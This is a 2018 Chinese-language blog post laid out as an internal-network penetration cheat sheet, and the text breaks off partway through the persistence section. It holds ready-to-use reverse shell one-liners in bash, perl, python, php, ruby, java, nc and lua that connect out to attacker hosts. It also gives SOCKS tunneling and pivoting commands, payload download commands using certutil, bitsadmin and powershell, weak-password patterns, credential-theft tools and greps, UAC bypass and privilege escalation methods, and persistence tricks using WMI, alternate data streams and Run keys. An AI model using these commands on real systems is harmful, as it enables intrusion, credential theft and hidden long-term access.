<!DOCTYPE html>
<html>
<head><meta name="generator" content="Hexo 3.8.0">
  <meta charset="utf-8">
  

  
  <title>内网渗透 | 0d4y</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
  <meta name="description" content="内网渗透1、信息收集开源情报收集(OSINT) github github_Nuggests(自动爬取Github上敏感信息、文件泄露) GSIL(能够实现近实时(15分钟内)的发现Github上泄露的信息) https://github.com/MiSecurity/x-patrol   whois查寻/注册人反查/邮箱反查/相关资产 站长之家 爱站 微步在线 IP反查 天眼查 虎妈查 历史漏洞">
<meta name="keywords" content="内网渗透">
<meta property="og:type" content="article">
<meta property="og:title" content="内网渗透">
<meta property="og:url" content="https://rich4rd0d4y.github.io/2018/09/07/2018-09-06-内网渗透/index.html">
<meta property="og:site_name" content="0d4y">
<meta property="og:description" content="内网渗透1、信息收集开源情报收集(OSINT) github github_Nuggests(自动爬取Github上敏感信息、文件泄露) GSIL(能够实现近实时(15分钟内)的发现Github上泄露的信息) https://github.com/MiSecurity/x-patrol   whois查寻/注册人反查/邮箱反查/相关资产 站长之家 爱站 微步在线 IP反查 天眼查 虎妈查 历史漏洞">
<meta property="og:locale" content="zh-Hans">
<meta property="og:updated_time" content="2018-10-21T10:31:12.013Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="内网渗透">
<meta name="twitter:description" content="内网渗透1、信息收集开源情报收集(OSINT) github github_Nuggests(自动爬取Github上敏感信息、文件泄露) GSIL(能够实现近实时(15分钟内)的发现Github上泄露的信息) https://github.com/MiSecurity/x-patrol   whois查寻/注册人反查/邮箱反查/相关资产 站长之家 爱站 微步在线 IP反查 天眼查 虎妈查 历史漏洞">
  
    <link rel="alternate" href="/atom.xml" title="0d4y" type="application/atom+xml">
  
  
    <link rel="icon" href="/favicon.png">
  
  
    <link href="//fonts.googleapis.com/css?family=Source+Code+Pro" rel="stylesheet" type="text/css">
  
  <link rel="stylesheet" href="/css/style.css">
</head>
</html>
<body>
  <div id="container">
    <div id="wrap">
      <header id="header">
  <div id="banner"></div>
  <div id="header-outer" class="outer">
    <div id="header-title" class="inner">
      <h1 id="logo-wrap">
        <a href="/" id="logo">0d4y</a>
      </h1>
      
    </div>
    <div id="header-inner" class="inner">
      <nav id="main-nav">
        <a id="main-nav-toggle" class="nav-icon"></a>
        
          <a class="main-nav-link" href="/">Home</a>
        
          <a class="main-nav-link" href="/archives">Archives</a>
        
      </nav>
      <nav id="sub-nav">
        
          <a id="nav-rss-link" class="nav-icon" href="/atom.xml" title="RSS Feed"></a>
        
        <a id="nav-search-btn" class="nav-icon" title="Search"></a>
      </nav>
      <div id="search-form-wrap">
        <form action="//google.com/search" method="get" accept-charset="UTF-8" class="search-form"><input type="search" name="q" class="search-form-input" placeholder="Search"><button type="submit" class="search-form-submit">&#xF002;</button><input type="hidden" name="sitesearch" value="https://rich4rd0d4y.github.io"></form>
      </div>
    </div>
  </div>
</header>
      <div class="outer">
        <section id="main"><article id="post-2018-09-06-内网渗透" class="article article-type-post" itemscope="" itemprop="blogPost">
  <div class="article-meta">
    <a href="/2018/09/07/2018-09-06-内网渗透/" class="article-date">
  <time datetime="2018-09-07T09:14:54.000Z" itemprop="datePublished">2018-09-07</time>
</a>
    
  <div class="article-category">
    <a class="article-category-link" href="/categories/内网渗透/">内网渗透</a>
  </div>

  </div>
  <div class="article-inner">
    
    
      <header class="article-header">
        
  
    <h1 class="article-title" itemprop="name">
      内网渗透
    </h1>
  

      </header>
    
    <div class="article-entry" itemprop="articleBody">
      
        <h1 id="内网渗透"><a href="#内网渗透" class="headerlink" title="内网渗透"></a>内网渗透</h1><h2 id="1、信息收集"><a href="#1、信息收集" class="headerlink" title="1、信息收集"></a>1、信息收集</h2><h3 id="开源情报收集-OSINT"><a href="#开源情报收集-OSINT" class="headerlink" title="开源情报收集(OSINT)"></a>开源情报收集(OSINT)</h3><ul>
<li>github<ul>
<li>github_Nuggests(自动爬取Github上敏感信息、文件泄露)</li>
<li>GSIL(能够实现近实时(15分钟内)的发现Github上泄露的信息)</li>
<li><a href="https://github.com/MiSecurity/x-patrol" target="_blank" rel="noopener">https://github.com/MiSecurity/x-patrol</a></li>
</ul>
</li>
<li>whois查寻/注册人反查/邮箱反查/相关资产<ul>
<li>站长之家</li>
<li>爱站</li>
<li>微步在线</li>
<li>IP反查</li>
<li>天眼查</li>
<li>虎妈查</li>
<li>历史漏洞查询<ul>
<li>在线查询(<a href="http://cb.drops.wiki" target="_blank" rel="noopener">http://cb.drops.wiki</a>)</li>
<li>自建查询(乌云镜像站)</li>
</ul>
</li>
<li>…</li>
</ul>
</li>
<li>google hacking</li>
</ul>
<h3 id="创建企业密码字典"><a href="#创建企业密码字典" class="headerlink" title="创建企业密码字典"></a>创建企业密码字典</h3><ul>
<li>字典列表<ul>
<li>passwordlist</li>
<li>猪猪侠字典</li>
<li>Blasting_dictionary（分享和收集各种字典，包括弱口令，常用密码，目录爆破。数据库爆破，编辑器爆破，后台爆破等）</li>
<li>针对特定的厂商，重点构造厂商相关域名的字典<pre><code>[‘%pwd%123’,’%user%123’,’%user%521’,’%user%2017’,’%pwd%321’,’%pwd%521’,’%user%321’,’%pwd%123!’,‘%pwd%123!@#’,’%pwd%1234’,’%user%2016’,’%user%123$%^’,‘%user%123!@#’,’%pwd%2016’,’%pwd%2017’,’%pwd%1!’,‘%pwd%2@’,’%pwd%3#’,‘%pwd%123#@!’,’%pwd%12345’,’%pwd%123$%^’,‘%pwd%!@#456’,’%pwd%123qwe’,’%pwd%qwe123’,’%pwd%qwe’,’%pwd%123456’,‘%user%123#@!’,‘%user%!@#456’,’%user%1234’,’%user%12345’,’%user%123456’,’%user%123!’]</code></pre></li>
</ul>
</li>
<li>密码生成<ul>
<li>genpAss（中国特色的弱口令生成器）（<a href="https://github.com/RicterZ/genpAss/）" target="_blank" rel="noopener">https://github.com/RicterZ/genpAss/）</a></li>
<li>passmaker（可以自定义规则的密码字典生成器）</li>
<li>pydictor（强大的密码生成器）</li>
<li>pentestdb</li>
</ul>
</li>
</ul>
<h3 id="使用已攻陷密码列表来查找邮件地址跟凭证信息"><a href="#使用已攻陷密码列表来查找邮件地址跟凭证信息" class="headerlink" title="使用已攻陷密码列表来查找邮件地址跟凭证信息"></a>使用已攻陷密码列表来查找邮件地址跟凭证信息</h3><ul>
<li>theHarvester</li>
<li>获取一个邮箱以后导出通讯录</li>
<li>LinkedInt</li>
</ul>
<h3 id="对企业外部相关信息进行扫描"><a href="#对企业外部相关信息进行扫描" class="headerlink" title="对企业外部相关信息进行扫描"></a>对企业外部相关信息进行扫描</h3><ul>
<li>子域名获取<ul>
<li>Layer子域名挖掘机4.2纪念版</li>
<li>subDomainsBrute</li>
<li>wydomain</li>
<li>Sublist3r</li>
<li>site:target.com</li>
<li>Github代码仓库</li>
<li>抓包分析请求返回值(跳转/文件上传/app/api接口等)</li>
<li>站长帮手links等在线查询网站</li>
<li>域传送漏洞<ul>
<li>Linux : <code>dig @ns.example.com example=.com AXFR</code></li>
<li>windows :  <code>nslookup -&gt; set type=ns -&gt;target.com -&gt; server ns.target.com -&gt; ls target.com</code></li>
</ul>
</li>
<li>GetDomainsBySSL.py</li>
<li>censys.io证书</li>
<li>shodan/fofa.so/zoomeye<ul>
<li>shadon</li>
<li>fofa</li>
<li>zoomeye</li>
</ul>
</li>
<li>dnsdb.io</li>
<li>api.hackertarget.com</li>
<li>community.riskiq.com</li>
<li>subdomain3</li>
<li>FuzzDomain</li>
<li>alive-host</li>
<li>dnsdumpster.com</li>
</ul>
</li>
</ul>
<h2 id="2、进入内网"><a href="#2、进入内网" class="headerlink" title="2、进入内网"></a>2、进入内网</h2><h3 id="基于企业弱账号漏洞"><a href="#基于企业弱账号漏洞" class="headerlink" title="基于企业弱账号漏洞"></a>基于企业弱账号漏洞</h3><ul>
<li>VPN（通过邮箱，密码爆破，社工等途径获取VPN）</li>
<li>企业相关运维系统（zabbix等）</li>
</ul>
<h3 id="基于系统漏洞进入"><a href="#基于系统漏洞进入" class="headerlink" title="基于系统漏洞进入"></a>基于系统漏洞进入</h3><ul>
<li>Metasploit(漏洞利用框架)</li>
<li>漏洞利用脚本</li>
</ul>
<h3 id="网站应用程序渗透"><a href="#网站应用程序渗透" class="headerlink" title="网站应用程序渗透"></a>网站应用程序渗透</h3><ul>
<li>SQL注入</li>
<li>跨站脚本（XSS）</li>
<li>跨站请求伪造（CSRF）</li>
<li>SSRF(ssrf_proxy)</li>
<li>功能/业务逻辑漏洞</li>
<li>其他漏洞等</li>
<li>CMS-内容管理系统漏洞</li>
<li>企业自建代理</li>
</ul>
<h3 id="社会工程学"><a href="#社会工程学" class="headerlink" title="社会工程学"></a>社会工程学</h3><ul>
<li>鱼叉攻击</li>
<li>水坑攻击</li>
</ul>
<h3 id="无线WIFI接入"><a href="#无线WIFI接入" class="headerlink" title="无线WIFI接入"></a>无线WIFI接入</h3><h2 id="3、隐匿攻击"><a href="#3、隐匿攻击" class="headerlink" title="3、隐匿攻击"></a>3、隐匿攻击</h2><h3 id="Command-and-Control"><a href="#Command-and-Control" class="headerlink" title="Command and Control"></a>Command and Control</h3><ul>
<li>ICMP</li>
<li>DNS</li>
<li>DropBox</li>
<li>Gmail</li>
<li>Telegram</li>
<li>Twitter</li>
<li>Website Keyword</li>
<li>PowerShell</li>
<li>Windows COM</li>
<li>WebDAV</li>
<li>Office 365</li>
<li>Active Directory</li>
<li>HTTPS</li>
<li>Kernel</li>
<li>Website</li>
<li>WMI</li>
<li>WebSocket</li>
<li>Images</li>
<li>Web Interface</li>
<li>JavaScript</li>
<li>…<h3 id="Froting"><a href="#Froting" class="headerlink" title="Froting"></a>Froting</h3></li>
<li>Domain Fronting</li>
<li>Tor Fronting</li>
</ul>
<h3 id="代理"><a href="#代理" class="headerlink" title="代理"></a>代理</h3><ul>
<li>VPN</li>
<li>shadowsockts</li>
<li>HTTP</li>
<li>Tor</li>
</ul>
<h2 id="4、内网跨边界应用"><a href="#4、内网跨边界应用" class="headerlink" title="4、内网跨边界应用"></a>4、内网跨边界应用</h2><h3 id="内网跨边界转发"><a href="#内网跨边界转发" class="headerlink" title="内网跨边界转发"></a>内网跨边界转发</h3><ul>
<li>NC端口转发</li>
<li>LCX端口转发</li>
<li>PS Powercat</li>
<li>代理脚本<ul>
<li>Tunna</li>
<li>Reduh</li>
</ul>
</li>
<li>…</li>
</ul>
<h3 id="内网跨边界代理穿透"><a href="#内网跨边界代理穿透" class="headerlink" title="内网跨边界代理穿透"></a>内网跨边界代理穿透</h3><ul>
<li>EW<ul>
<li>正向 SOCKS v5 服务器: <code>./ew -s ssocksd -l 1080</code></li>
<li>反弹 SOCKS v5 服务器:<br>a) 先在一台具有公网 ip 的主机A上运行以下命令：<code>./ew -s rcsocks -l 1080 -e 8888 </code><br>b) 在目标主机B上启动 SOCKS v5 服务 并反弹到公网主机的 8888端口<pre><code>./ew -s rssocks -d 1.1.1.1 -e 8888 </code></pre></li>
<li>多级级联<pre><code>./ew -s lcx_listen -l 1080 -e 8888</code>
<code>./ew -s lcx_tran -l 1080 -f 2.2.2.3 -g 9999</code>
<code>./ew -s lcx_slave -d 1.1.1.1 -e 8888 -f 2.2.2.3 -g 9999</code></pre>
  * lcx_tran 的用法
<pre><code>./ew -s ssocksd -l 9999</code>
<code>./ew -s lcx_tran -l 1080 -f 127.0.0.1 -g 9999</code></pre>
  * lcx_listen、lcx_slave 的用法
<pre><code>./ew -s lcx_listen -l 1080 -e 8888</code>
<code>./ew -s ssocksd -l 9999</code>
<code>./ew -s lcx_slave -d 127.0.0.1 -e 8888 -f 127.0.0.1 -g 9999</code></pre>
  * “三级级联”的本地SOCKS测试用例以供参考
<pre><code>./ew -s rcsocks -l 1080 -e 8888</code>
<code>./ew -s lcx_slave -d 127.0.0.1 -e 8888 -f 127.0.0.1 -g 9999</code>
<code>./ew -s lcx_listen -l 9999 -e 7777</code>
<code>./ew -s rssocks -d 127.0.0.1 -e 7777</code></pre></li>
</ul>
</li>
<li>Termite<ul>
<li>使用说明:<a href="http://rootkiter.com/Termite/README.txt" target="_blank" rel="noopener">http://rootkiter.com/Termite/README.txt</a></li>
</ul>
</li>
<li>代理脚本<ul>
<li>reGeorg</li>
</ul>
</li>
<li>…</li>
</ul>
<h3 id="shell反弹"><a href="#shell反弹" class="headerlink" title="shell反弹"></a>shell反弹</h3><ul>
<li>bash  <pre><code>bash -i >& /dev/tcp/10.0.0.1/8080 0>&1</code></pre></li>
<li>perl  <pre><code>perl -e 'use Socket;
  $i="10.0.0.1";
  p=1234;
  socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));
  if(connect(S,sockaddr_in($p,inet_aton($i))))
  {open(STDIN,">&S");
  open(STDOUT,">&S");
  open(STDERR,">&S");
  exec("/bin/sh -i");
  };'</code></pre></li>
<li>python  <pre><code>python -c 'import socket,subprocess,os;
  s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
  s.connect(("10.0.0.1",1234));
  os.dup2(s.fileno(),0); 
  os.dup2(s.fileno(),1); 
  os.dup2(s.fileno(),2);
  p=subprocess.call(["/bin/sh","-i"]);'</code></pre></li>
<li>php  <pre><code>php -r '$sock=fsockopen("10.0.0.1",1234);
  exec("/bin/sh -i <&3>&3 2>&3");'</&3></code></pre></li>
<li>ruby  <pre><code>ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;
  exec sprintf("/bin/sh -i <&%d>&%d 2>&%d",f,f,f)'</&%d></code></pre></li>
<li>java  <pre><code>r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;
cat <&5 2="" |="" while="" read="" line;="" do="" \$line="">&5 >&5; done"] as String[])
p.waitFor()</&5></code></pre></li>
<li>nc<ul>
<li>使用-e : <pre><code>nc -e /bin/sh 223.8.200.234 1234</code></pre></li>
<li>不使用-e: <pre><code>mknod /tmp/backpipe p<br>/bin/sh 0/tmp/backpipe | nc attackerip listenport 1&gt;/tmp/backpipe</code></pre></li>
</ul>
</li>
<li>lua <pre><code>lua -e "require('socket');
 require('os');
 t=socket.tcp();
 t:connect('202.103.243.122','1234');
 os.execute('/bin/sh -i <&3>&3 2>&3');"</&3></code></pre></li>
<li>…</li>
</ul>
<h3 id="内网文件的传输和下载"><a href="#内网文件的传输和下载" class="headerlink" title="内网文件的传输和下载"></a>内网文件的传输和下载</h3><ul>
<li>wput<ul>
<li><pre><code>wput dir_name ftp://linuxpig:123456@host.com/</code></pre></li>
</ul>
</li>
<li>wget<ul>
<li><pre><code>wget http://site.com/1.rar -O 1.rar</code></pre></li>
</ul>
</li>
<li>ariac2(需安装)<ul>
<li><pre><code>aria2c -o owncloud.zip https://download.owncloud.org/community/owncloud-9.0.0.tar.bz2</code></pre></li>
</ul>
</li>
<li>powershell<ul>
<li><pre><code>$p = New-Object System.Net.WebClient $p.DownloadFile("http://domain/file","C:%homepath%file") </code></pre></li>
</ul>
</li>
<li>vbs脚本<ul>
<li><pre><code>Set args = Wscript.Arguments<br>Url = “<a href="http://domain/file&quot;" target="_blank" rel="noopener">http://domain/file&quot;</a><br>dim xHttp: Set xHttp = createobject(“Microsoft.XMLHTTP”)<br>dim bStrm: Set bStrm = createobject(“Adodb.Stream”)<br>xHttp.Open “GET”, Url, False<br>xHttp.Send<br>with bStrm<br>.type = 1 ‘<br>.open<br>.write xHttp.responseBody<br>.savetofile “ C:\%homepath%\file”, 2 ‘<br>end with</code></pre><ul>
<li>执行 ：<code>cscript test.vbs</code></li>
</ul>
</li>
</ul>
</li>
<li>perl<ul>
<li><pre><code>#!/usr/bin/perl<br>use LWP::Simple;<br>getstore(“<a href="http://domain/file&quot;" target="_blank" rel="noopener">http://domain/file&quot;</a>, “file”);</code></pre><ul>
<li>执行：<code>perl test.pl</code></li>
</ul>
</li>
</ul>
</li>
<li>python<ul>
<li><pre><code>#!/usr/bin/python<br>import urllib2<br>u = urllib2.urlopen(‘<a href="http://domain/file&#39;" target="_blank" rel="noopener">http://domain/file&#39;</a>)<br>localFile = open(‘local_file’, ‘w’)<br>localFile.write(u.read())<br>localFile.close()</code></pre><ul>
<li>执行：<code>python test.py</code></li>
</ul>
</li>
</ul>
</li>
<li>ruby<ul>
<li><pre><code>#!/usr/bin/ruby<br>require ‘net/http’<br>Net::HTTP.start(“<a href="http://www.domain.com&quot;" target="_blank" rel="noopener">www.domain.com&quot;</a>) { |http|<br>r = http.get(“/file”)<br>open(“save_location”, “wb”) { |file|<br>file.write(r.body)<br>}<br>}</code></pre><ul>
<li>执行：<code>ruby test.rb</code></li>
</ul>
</li>
</ul>
</li>
<li>php<ul>
<li><pre><code>#!/usr/bin/php<br>$lf = “local_file”;<br>$fh = fopen($lf, ‘w’);<br>fwrite($fh, $data[0]);<br>fclose($fh);<br>?&gt;</code></pre><ul>
<li>执行：<code>php test.php</code></li>
</ul>
</li>
</ul>
</li>
<li>NC<ul>
<li>attacker<ul>
<li><pre><code>cat file | nc -l 1234</code></pre></li>
</ul>
</li>
<li>target<ul>
<li><code>nc host_ip 1234 &gt; file</code></li>
</ul>
</li>
</ul>
</li>
<li>FTP<ul>
<li><code>ftp 127.0.0.1 username password get file exit</code></li>
</ul>
</li>
<li>TFTP<ul>
<li><code>tftp -i host GET C:%homepath%file location_of_file_on_tftp_server</code></li>
</ul>
</li>
<li>Bitsadmin<ul>
<li><code>bitsadmin /transfer n <a href="http://domain/file" target="_blank" rel="noopener">http://domain/file</a> c:%homepath%file</code></li>
</ul>
</li>
<li>Window 文件共享<ul>
<li><code>net use x: \127.0.0.1\share /user:example.comuserID myPassword</code></li>
</ul>
</li>
<li>SCP<ul>
<li>本地到远程<ul>
<li><code>scp file <a href="mailto:user@host.com" target="_blank" rel="noopener">user@host.com</a>:/tmp</code></li>
</ul>
</li>
<li>远程到本地<ul>
<li><code>scp <a href="mailto:user@host.com" target="_blank" rel="noopener">user@host.com</a>:/tmp file</code></li>
</ul>
</li>
</ul>
</li>
<li>rsync<ul>
<li>远程rsync服务器中拷贝文件到本地机<ul>
<li><code>rsync -av <a href="mailto:root@192.168.78.192" target="_blank" rel="noopener">root@192.168.78.192</a>::www /databack</code></li>
</ul>
</li>
<li>本地机器拷贝文件到远程rsync服务器<ul>
<li><code>rsync -av /databack <a href="mailto:root@192.168.78.192" target="_blank" rel="noopener">root@192.168.78.192</a>::www</code></li>
</ul>
</li>
</ul>
</li>
<li>certuuil.exe<ul>
<li><code>certutil.exe -urlcache -split -f <a href="http://site.com/file" target="_blank" rel="noopener">http://site.com/file</a></code></li>
</ul>
</li>
<li>…</li>
</ul>
<h2 id="5、内网信息收集"><a href="#5、内网信息收集" class="headerlink" title="5、内网信息收集"></a>5、内网信息收集</h2><h3 id="本机信息收集"><a href="#本机信息收集" class="headerlink" title="本机信息收集"></a>本机信息收集</h3><ul>
<li>1、用户列表<ul>
<li>windows用户列表</li>
<li>分析邮件用户，内网[域]邮件用户，通常就是内网[域]用户</li>
</ul>
</li>
<li>2、进程列表<ul>
<li>分析杀毒软件/安全监控工具等</li>
<li>邮件客户端</li>
<li>VPN</li>
<li>ftp等</li>
</ul>
</li>
<li>3、服务列表<ul>
<li>与安全防范工具有关服务[判断是否可以手动开关等]</li>
<li>存在问题的服务[权限/漏洞]</li>
</ul>
</li>
<li>4、端口列表<ul>
<li>开放端口对应的常见服务/应用程序[匿名/权限/漏洞等]</li>
<li>利用端口进行信息收集</li>
</ul>
</li>
<li>5、补丁列表<ul>
<li>分析 Windows 补丁</li>
<li>第三方软件[Java/Oracle/Flash 等]漏洞</li>
</ul>
</li>
<li>6、本机共享<ul>
<li>本机共享列表/访问权限</li>
<li>本机访问的域共享/访问权限</li>
</ul>
</li>
<li>7、本用户习惯分析<ul>
<li>历史记录</li>
<li>收藏夹</li>
<li>文档等</li>
</ul>
</li>
<li>8、获取当前用户密码工具<ul>
<li>Windows<ul>
<li>mimikatz</li>
<li>wce</li>
<li>Invoke-WCMDump</li>
<li>mimiDbg</li>
<li>LaZagne</li>
<li>nirsoft_package</li>
<li>QuarksPwDump</li>
<li>fgdump</li>
<li>星号查看器等</li>
</ul>
</li>
<li>Linux<ul>
<li>LaZagne</li>
<li>mimipenguin</li>
</ul>
</li>
</ul>
</li>
</ul>
<h3 id="扩散信息收集"><a href="#扩散信息收集" class="headerlink" title="扩散信息收集"></a>扩散信息收集</h3><ul>
<li>端口扫描<ul>
<li>常用端口扫描工具<ul>
<li>nmap</li>
<li>masscan</li>
<li>s扫描器</li>
<li>自写脚本等</li>
<li>NC<ul>
<li>nc -v -w 2 -z 192.168.1.1 20-1000</li>
</ul>
</li>
</ul>
</li>
</ul>
</li>
<li>内网拓扑架构分析（DMZ，管理网，生产网，测试网）</li>
<li><p>常见信息收集命令</p>
<ul>
<li>net user ——&gt; 本机用户列表</li>
<li>net localgroup administrators ——&gt; 本机管理员[通常含有域用户]</li>
<li>net user /domain ——&gt; 查询域用户</li>
<li>net group /domain ——&gt; 查询域里面的工作组</li>
<li>net group “domain admins” /domain ——&gt; 查询域管理员用户组</li>
<li>net localgroup administrators /domain ——&gt; 登录本机的域管理员</li>
<li>net localgroup administrators workgroup\user001 /add —–&gt;域用户添加到本机</li>
<li>net group “Domain controllers” ——-&gt; 查看域控制器(如果有多台)</li>
<li>ipconfig /all ——&gt; 查询本机 IP 段，所在域等</li>
<li>net view ——&gt; 查询同一域内机器列表 net view /domain ——&gt; 查询域列表</li>
<li><p>net view /domain:domainname</p>
<ul>
<li>dsquery<ul>
<li>列出该域内所有机器名(dsquery computer domainroot -limit 65535 &amp;&amp; net group “domain computers” /domain)</li>
<li>列出该域内所有用户名(dsquery user domainroot -limit 65535 &amp;&amp; net user /domain)</li>
<li>列出该域内网段划分 (dsquery subnet)</li>
<li>列出该域内分组 (dsquery group &amp;&amp; net group /domain)</li>
<li>列出该域内组织单位 (dsquery ou)</li>
<li>列出该域内域控制器 (dsquery server &amp;&amp; net time /domain)</li>
<li>列出域管理员帐号 (net group “domain admins” /domain)</li>
</ul>
</li>
</ul>
</li>
</ul>
</li>
</ul>
<h3 id="第三方信息收集"><a href="#第三方信息收集" class="headerlink" title="第三方信息收集"></a>第三方信息收集</h3><ul>
<li>NETBIOS 信息收集</li>
<li>SMB 信息收集</li>
<li>空会话信息收集</li>
<li>漏洞信息收集等</li>
</ul>
<h2 id="6、权限提升"><a href="#6、权限提升" class="headerlink" title="6、权限提升"></a>6、权限提升</h2><h3 id="Windows"><a href="#Windows" class="headerlink" title="Windows"></a>Windows</h3><ul>
<li>BypassUAC<ul>
<li>常用方法<ul>
<li>使用IFileOperation COM接口</li>
<li>使用Wusa.exe的extract选项</li>
<li>远程注入SHELLCODE 到傀儡进程</li>
<li>DLL劫持，劫持系统的DLL文件</li>
<li>eventvwr.exe and registry hijacking</li>
<li>sdclt.exe</li>
<li>SilentCleanup</li>
<li>wscript.exe</li>
<li>cmstp.exe</li>
<li>修改环境变量，劫持高权限.Net程序</li>
<li>修改注册表HKCU\Software\Classes\CLSID，劫持高权限程序</li>
<li>直接提权过UAC</li>
</ul>
</li>
<li>常用工具<ul>
<li>UACME</li>
<li>Bypass-UAC</li>
<li>Yamabiko</li>
<li>…</li>
</ul>
</li>
</ul>
</li>
<li>提权<ul>
<li>windows内核漏洞提权<ul>
<li>检测类<ul>
<li>Windows-Exploit-Suggester</li>
<li>WinSystemHelper</li>
</ul>
</li>
<li>利用类<ul>
<li>windows-kernel-exploits</li>
</ul>
</li>
</ul>
</li>
<li>服务提权<ul>
<li>数据库服务，ftp服务等</li>
</ul>
</li>
<li>WINDOWS错误系统配置</li>
<li>系统服务的错误权限配置漏洞</li>
<li>不安全的注册表权限配置</li>
<li>不安全的文件/文件夹权限配置</li>
<li>计划任务</li>
<li>任意用户以NT AUTHORITY\SYSTEM权限安装msi</li>
<li>提权脚本<ul>
<li>PowerUP</li>
<li>ElevateKit</li>
</ul>
</li>
</ul>
</li>
</ul>
<h3 id="Linux"><a href="#Linux" class="headerlink" title="Linux"></a>Linux</h3><ul>
<li>内核溢出提权<ul>
<li>linux-kernel-exploits</li>
</ul>
</li>
<li>计划任务<ul>
<li><pre><code>crontab -l
ls -alh /var/spool/cron
ls -al /etc/ | grep cron
ls -al /etc/cron*
cat /etc/cron*
cat /etc/at.allow
cat /etc/at.deny
cat /etc/cron.allow
cat /etc/cron.deny
cat /etc/crontab
cat /etc/anacrontab
cat /var/spool/cron/crontabs/root</code></pre></li>
</ul>
</li>
<li>SUID<ul>
<li><pre><code>find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} \;</code></pre></li>
</ul>
</li>
<li>系统服务的错误权限配置漏洞<ul>
<li><pre><code>cat /var/apache2/config.inc
cat /var/lib/mysql/mysql/user.MYD
cat /root/anaconda-ks.cfg</code></pre></li>
</ul>
</li>
<li>不安全的文件/文件夹权限配置<ul>
<li><pre><code>cat ~/.bash_history
cat ~/.nano_history
cat ~/.atftp_history
cat ~/.mysql_history
cat ~/.php_history</code></pre></li>
</ul>
</li>
<li>找存储的明文用户名，密码<ul>
<li><pre><code>grep -i user [filename]
grep -i pass [filename]
grep -C 5 "password" [filename]
find . -name "*.php" -print0 | xargs -0 grep -i -n "var $password" # Joomla</code></pre>

</li>
</ul>
</li>
</ul>
<h2 id="7、权限维持"><a href="#7、权限维持" class="headerlink" title="7、权限维持"></a>7、权限维持</h2><h3 id="系统后门"><a href="#系统后门" class="headerlink" title="系统后门"></a>系统后门</h3><ul>
<li>windows<ul>
<li>1、密码记录工具<ul>
<li>WinlogonHack<br>WinlogonHack 是一款用来劫取远程3389登录密码的工具，在 WinlogonHack 之前有 一个 Gina 木马主要用来截取 Windows 2000下的密码，WinlogonHack 主要用于截 取 Windows XP 以及 Windows 2003 Server。<br>键盘记录器<br>安装键盘记录的目地不光是记录本机密码，是记录管理员一切的密码，比如说信箱，WEB 网页密码等等，这样也可以得到管理员的很多信息。<br>NTPass<br>获取管理员口令,一般用 gina 方式来,但有些机器上安装了 pcanywhere 等软件，会导致远程登录的时候出现故障，本软件可实现无障碍截取口令。<br>Linux 下 openssh 后门<br>重新编译运行的sshd服务，用于记录用户的登陆密码。</li>
</ul>
</li>
<li>2、常用的存储Payload位置<ul>
<li>WMI<ul>
<li>存储：<pre><code>$StaticClass = New-Object Management.ManagementClass('root\cimv2', $null,$null)
$StaticClass.Name = 'Win32_Command'
$StaticClass.Put()
$StaticClass.Properties.Add('Command' , $Payload)
$StaticClass.Put() </code></pre></li>
<li>读取:<br><code>$Payload=([WmiClass] ‘Win32_Command’).Properties[‘Command’].Value</code></li>
</ul>
</li>
<li>包含数字签名的PE文件：利用文件hash的算法缺陷，向PE文件中隐藏Payload，同时不影响该PE文件的数字签名</li>
<li>特殊ADS<ul>
<li>特殊COM文件<ul>
<li><pre><code>type putty.exe > \\.\C:\test\ads\COM1:putty.exe
wmic process call create \\.\C:\test\ads\COM1:putty.exe</code></pre></li>
</ul>
</li>
<li>磁盘根目录<ul>
<li><pre><code>type putty.exe >C:\:putty.exe 
wmic process call create C:\:putty.exe</code></pre></li>
</ul>
</li>
<li>…<ul>
<li><pre><code>type putty.exe > ...:putty.exe
wmic process call create c:\test\ads\...:putty.exe</code></pre></li>
</ul>
</li>
</ul>
</li>
</ul>
</li>
<li>3、Run/RunOnce Keys<ul>
<li>用户级<ul>
<li><pre><code>HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce</code></pre></li>
</ul>
</li>
<li>管理员<ul>
<li><pre><code>HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run</code></pre></li>
</ul>
</li>
</ul>
</li>
<li>4、BootExecute Key<ul>
<li>由于smss.exe在Windows子系统加载之前启动，因此会调用配置子系统来加载当前的配置单元，具体注册表键值为：<pre><code>HKLM\SYSTEM\CurrentControlSet\Control\hivelist
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Control\Session Manager</code></pre></li>
</ul>
</li>
<li>5、Userinit Key<ul>
<li>WinLogon进程加载的login scripts,具体键值：<br><code>HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon</code></li>
</ul>
</li>
<li>6、Startup Keys<ul>
<li><pre><code>HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders</code></pre></li>
</ul>
</li>
<li>7、Services<ul>
<li>创建服务<ul>
<li><code>sc create [ServerName] binPath= BinaryPathName</code></li>
</ul>
</li>
</ul>
</li>
<li>8、Browser Helper Objects<ul>
<li>本质上是Internet Explorer启动时加载的DLL模块<br><code>HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects</code></li>
</ul>
</li>
<li>9、AppInit_DLLs<ul>
<li>加载User32.dll会加载的DLL<pre><code>HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_DLLs</code></pre></li>
</ul>
</li>
<li>10、文件关联<ul>
